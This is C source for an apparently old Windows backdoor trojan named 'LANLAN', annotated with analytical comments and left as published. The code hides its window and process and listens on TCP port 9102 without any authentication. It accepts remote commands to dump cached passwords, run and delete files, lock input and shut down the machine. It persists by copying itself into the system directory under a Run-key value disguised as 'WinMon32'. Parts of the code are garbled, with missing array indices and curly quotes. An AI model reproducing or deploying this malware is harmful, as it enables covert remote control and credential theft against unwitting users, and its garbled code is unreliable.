// extraction. Left as published.
VOID ExeCommand(LPCTSTR szCommand,HWND hWnd)

{

TCHAR szBuf[MAX_PATH];

TCHAR Param1[100];

TCHAR Param2[100];

int i;

if((lstrcmp(szCommand,"getpw"))==0)

GetCachePW();

else if((lstrcmp(szCommand,"getinfo"))==0)

GetSysInfo();

else if((lstrcmp(szCommand,"gcpath"))==0)

GetCurPath();

else if((lstrcmp(szCommand,"opencd"))==0)

CtrlCD(hWnd,TRUE);

else if((lstrcmp(szCommand,"closecd"))==0)

CtrlCD(hWnd,FALSE);

else if((lstrcmp(szCommand,"showsys"))==0)

HSSys(hWnd,TRUE);

else if((lstrcmp(szCommand,"hidesys"))==0)

HSSys(hWnd,FALSE);

else if((lstrcmp(szCommand,"lockmk"))==0)

LockMK(TRUE);

else if((lstrcmp(szCommand,"unlock"))==0)

LockMK(FALSE);

else if((lstrcmp(szCommand,"dproc"))==0)

EnumProcess();

else if((lstrcmp(szCommand,"exitwin"))==0)

ExitWin();

else if((strncmp(szCommand,"popmsg",lstrlen("popmsg")))==0)

{

if(lstrlen(szCommand)<=lstrlen("popmsg")+2)

{

send(NewSock,"usage : popmsg Message",28,0);

}

for(i=lstrlen("popmsg")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("popmsg")+1);

PopMsg(Param1,hWnd);

}

}

else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)

{

if(lstrlen(szCommand)<=lstrlen("execfile")+2)

{

send(NewSock,"usage : execfile szFileName",28,0);

}

for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("execfile")+1);

if(LoadProcess(Param1)==FALSE)

send(NewSock,"execfile Fail",14,0);

else

send(NewSock,"execfile OK",11,0);

}

}

else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)

{

if(lstrlen(szCommand)<=lstrlen("cd")+2)

{

send(NewSock,"cd Drive//Directory",19,0);

}

for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("cd")+1);

if(ChangeDir(Param1)==FALSE)

send(NewSock,"Change Directory Fail",21,0);

else

send(NewSock,"Change Directory OK",19,0);

}

}

else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)

{

// a bare "dir" lists the current directory; a pattern argument is passed through
if(lstrlen(szCommand)<=lstrlen("dir")+2)

{

Dir("*.*");

}

for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("dir")+1);

Dir(Param1);

}

}

else if((strncmp(szCommand,"del",lstrlen("del")))==0)

{

if(lstrlen(szCommand)<=lstrlen("del")+2)

{

send(NewSock,"usage : DEL szFileName",28,0);

}

for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("del")+1);

Delete(Param1);

}

}

else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)

{

if(lstrlen(szCommand)<=lstrlen("COPY")+2)

{

send(NewSock,"usage : COPY Drive//Filename ",28,0);

return;

}

for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

// no second token: report usage, Param2 stays empty
lstrcpy(Param1,szCommand+lstrlen("copy")+1);

lstrcpy(Param2,"");

send(NewSock,"Copy File1 to File2",19,0);

}

else

{

// split the line at the second space: Param1 = source, Param2 = destination
lstrcpy(szBuf,szCommand);

szBuf=0;

lstrcpy(Param1,szBuf+lstrlen("copy")+1);

lstrcpy(Param2,szBuf+i+1);

Copy(Param1,Param2);

}

}

else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)

{

if(lstrlen(szCommand)<=lstrlen("ren")+2)

{

send(NewSock,"usage : REN Drive//Filename ",28,0);

return;

}

for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)

if(szCommand==‘ ‘)break;

if(i==lstrlen(szCommand))

{

lstrcpy(Param1,szCommand+lstrlen("ren")+1);

lstrcpy(Param2,"");

send(NewSock,"Ren File1 to File2",19,0);

}

else

{

lstrcpy(szBuf,szCommand);

szBuf=0;

lstrcpy(Param1,szBuf+lstrlen("ren")+1);

lstrcpy(Param2,szBuf+i+1);

Ren(Param1,Param2);

}

}

else

send(NewSock,"Bad Command !!!",16,0);

}

//---------------------------------------------------------------------------

// InitSocket

// 初始化SOCKET

//--------------------------------------------------------------------------

// Creates the listener: Winsock 1.1, a TCP socket with SO_REUSEADDR, bound to
// INADDR_ANY:PORT (9102) with a backlog of 3, and registered with WSAAsyncSelect so
// FD_ACCEPT/FD_CLOSE arrive at hWnd as WM_SOCKET. No client address filter and no
// credential exchange are set up here or anywhere else in the listing.
// Returns FALSE on any failure; each failure path also shows a MessageBox, which is
// visible on the desktop and is the one user-facing symptom this code produces.
// Note: socket() failure is compared against SOCKET_ERROR (-1) rather than
// INVALID_SOCKET; the two compare equal after conversion, so the check still works.
BOOL WINAPI InitSocket(HWND hWnd)

{

if((WSAStartup(dwVersion,&wsaData))!=0)

{

MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);

return FALSE;

}

CreateSock=socket(AF_INET,SOCK_STREAM,0);

if(CreateSock==SOCKET_ERROR)

{

closesocket(CreateSock);

MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);

return FALSE;

}

Sock_in.sin_family=AF_INET;

Sock_in.sin_port=htons(PORT);

Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);

setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));

if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)

{

closesocket(CreateSock);

MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);

return FALSE;

}

else if(listen(CreateSock,3)==SOCKET_ERROR)

{

closesocket(CreateSock);

MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);

return FALSE;

}

else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)

{

closesocket(CreateSock);

MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);

return FALSE;

}

addrlen=sizeof(SOCKADDR_IN);

return TRUE;

}

//---------------------------------------------------------------------------

// Window procedure of the hidden "LANLAN" window; all network activity is driven
// from here through WM_SOCKET notifications.
//  FD_ACCEPT: accepts the pending connection into the global NewSock (an earlier
//    client's socket is overwritten, not closed), subscribes it to FD_READ/FD_WRITE/
//    FD_CLOSE, and sends the banner "LANLAN Ver 1.0 Write by VIRUS" followed by
//    PROMPT. The banner is sent as dwComm (50) bytes regardless of its length, and it
//    is the first thing a client sees, with no authentication step before or after.
//  FD_READ: reads up to dwComm bytes. If the first byte is VK_RETURN (0x0D) the
//    line accumulated so far in szExec is passed to ExeCommand and cleared;
//    otherwise the chunk is appended to szExec with lstrcat, which has no bound on
//    the 50-byte static buffer. The received chunk is echoed back as 50 bytes.
//  FD_CLOSE / select error: closes the socket named in wParam.
//  WM_DESTROY: unregisters the service-process flag (HideProc) and quits.
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)

{

static TCHAR szCommand[dwComm];

static TCHAR szExec[dwComm];

switch(message)

{

case WM_SOCKET:

if(WSAGETSELECTERROR(lParam))

{

closesocket(wParam);

break;

}

switch(WSAGETSELECTEVENT(lParam))

{

// connection accepted
case FD_ACCEPT:

NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);

WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);

wsprintf(szCommand,"LANLAN Ver 1.0 Write by VIRUS/n/n/r%s",PROMPT);

send(NewSock,szCommand,dwComm,0);

break;

// read input: on a carriage return execute the accumulated command,
// otherwise append the input to the command buffer
case FD_READ:

ZeroMemory(szCommand,dwComm);

recv(NewSock,szCommand,dwComm,0);

if(szCommand[0]==VK_RETURN)

{

wsprintf(szCommand,"/n/n/r%s",PROMPT);

send(NewSock,szCommand,dwComm,0);

ExeCommand(szExec,hWnd);

ZeroMemory(szExec,dwComm);

}

else

lstrcat(szExec,szCommand);

// runs on both branches (the else has no braces): echoes the last chunk
send(NewSock,szCommand,dwComm,0);

break;

case FD_CLOSE:

closesocket(wParam);

break;

}

break;

case WM_DESTROY:

HideProc(UNSERVICE_PROC);

PostQuitMessage(0);

break;

default:

return DefWindowProc(hWnd,message,wParam,lParam);

}

return 0;

}

//---------------------------------------------------------------------------

// Entry point (return type omitted; relies on implicit int). Sequence:
//  1. registers window class "LANLAN" and creates a top-level window titled
//     "LANLANServer", immediately hidden; both names are enumerable on the host;
//  2. on Win9x calls HideProc(SERVICE_PROC) to drop out of the task list;
//  3. starts the listener (InitSocket return value ignored);
//  4. persistence: copies its own image to <system directory> + RUN and writes the
//     path as REG_SZ value "WinMon32" under HKLM ...CurrentVersion\Run (the key path
//     literal appears with forward slashes in this listing);
//  5. runs the message loop until WM_QUIT.
// Notes: RegCreateKeyEx is asked for KEY_ALL_ACCESS on HKLM, which requires
// administrative rights on NT; REG_OPTION_VOLATILE only affects a key that is newly
// created by this call; RegSetValueEx is given lstrlen() as the size, so the stored
// REG_SZ data omits its terminating NUL. CopyFile with bFailIfExists=FALSE overwrites
// an existing drop file on every start.
WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, LPSTR, int)

{

HWND hWnd;

MSG msg;

WNDCLASS wndc;

LPSTR szAppName="LANLAN";

HKEY hKey=0;

DWORD disp=0;

LONG lResult;

TCHAR szKey[MAX_PATH];

TCHAR szSysDir[MAX_PATH+25];

TCHAR szFileName[MAX_PATH];

wndc.style=0;

wndc.lpfnWndProc=WndProc;

wndc.cbClsExtra=0;

wndc.cbWndExtra=0;

wndc.hInstance=hInstance;

wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);

wndc.hCursor=LoadCursor(NULL,IDC_ARROW);

wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);

wndc.lpszMenuName=NULL;

wndc.lpszClassName=szAppName;

RegisterClass(&wndc);

hWnd=CreateWindow(szAppName,"LANLANServer",

WS_OVERLAPPEDWINDOW,

CW_USEDEFAULT,CW_USEDEFAULT,

CW_USEDEFAULT,CW_USEDEFAULT,

NULL,NULL,hInstance,NULL);

ShowWindow(hWnd,SW_HIDE);

UpdateWindow(hWnd);

if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)

{

HideProc(SERVICE_PROC);

}

InitSocket(hWnd);

// copy this executable into the system directory
// and register it under the Run key so it starts automatically
GetSystemDirectory(szSysDir,MAX_PATH);

lstrcat(szSysDir,RUN);

GetModuleFileName(NULL,szFileName,MAX_PATH);

CopyFile(szFileName,szSysDir,FALSE);

lstrcpy(szKey,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run");

lResult=RegCreateKeyEx(HKEY_LOCAL_MACHINE,szKey,0,NULL,REG_OPTION_VOLATILE,

KEY_ALL_ACCESS,NULL,&hKey,&disp);

if(lResult==ERROR_SUCCESS)

{

lResult=RegSetValueEx(hKey,"WinMon32",0,REG_SZ,szSysDir,lstrlen(szSysDir));

RegCloseKey(hKey);

}

while(GetMessage(&msg,NULL,0,0))

{

TranslateMessage(&msg);

DispatchMessage(&msg);

}

return (msg.wParam);

}
